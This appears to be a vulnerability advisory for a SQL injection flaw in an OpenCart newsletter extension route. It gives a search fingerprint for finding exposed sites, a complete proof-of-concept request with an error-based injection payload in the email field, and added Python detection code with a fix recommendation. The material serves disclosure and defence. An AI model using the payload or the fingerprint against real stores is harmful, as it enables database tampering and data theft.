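SQL Injection Vulnerability in the extension Interface of the OpenCart E-commerce Site-Building System
1. Vulnerability Overview
OpenCart is a globally popular open-source PHP e-commerce site-building system. The OpenCart standalone store-building system is easy to install, feature-rich and simple to operate, and it supports multiple languages, multiple currencies and multiple stores. OpenCart has a rich development ecosystem and can integrate with well-known ERP systems such as Odoo, Beahu SCM, Yonyou and Kingdee. The extension interface of the OpenCart communication module has a SQL injection vulnerability. A malicious attacker may exploit it to modify data in the database, for example by adding, deleting or modifying records, leading to data corruption or loss.
2. Cyberspace Mapping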
body="extension/module/so_newletter_custom_popup/newsletter"
3. Vulnerability Reproduction
POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

createdate=2024-5-15 09:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT md5(123)),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)#&status=0
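For defenders, the request above can be caught at a proxy or in log review by checking that each form field sent to this route has the shape the newsletter form should produce. The following is an added example, not code from the original page or from OpenCart. The field patterns, the function name inspect_request and both sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Route taken from the request shown on this page.
ROUTE = "extension/module/so_newletter_custom_popup/newsletter"

# Allowlist per field (assumed shapes, inferred from the parameters in the request above).
FIELD_RULES = {
    "email": re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}\.[A-Za-z]{2,}"),
    "createdate": re.compile(r"\d{4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}:\d{1,2}"),
    "status": re.compile(r"\d{1,2}"),
}

def inspect_request(raw):
    """Return findings for one raw HTTP request; an empty list means clean or out of scope."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2:
        return ["malformed request line"]
    method, target = request_line[0], request_line[1]
    route = parse_qs(urlsplit(target).query).get("route", [""])[0]
    if method != "POST" or route != ROUTE:
        return []  # not the newsletter endpoint
    fields = parse_qs(body.strip(), keep_blank_values=True)
    findings = []
    for name, rule in FIELD_RULES.items():
        for value in fields.get(name, []):
            # fullmatch rejects quotes, spaces, comments and anything else outside the shape
            if not rule.fullmatch(value):
                findings.append(f"{name}: value outside allowlist: {value[:40]!r}")
    return findings

# Constructed sample requests (shop.example is a placeholder host).
_HEAD = (
    "POST /index.php?route=" + ROUTE + " HTTP/1.1\n"
    "Host: shop.example\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
)
BENIGN = _HEAD + "createdate=2024-5-15 09:4:6&email=alice%40example.com&status=0"
SUSPICIOUS = _HEAD + "createdate=2024-5-15 09:4:6&email=hi' AND (SELECT 1)#&status=0"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, inspect_request(req))
```

A check like this only flags or blocks traffic; the underlying fix is for the module to validate the email value and bind it as a query parameter instead of concatenating it into the SQL statement.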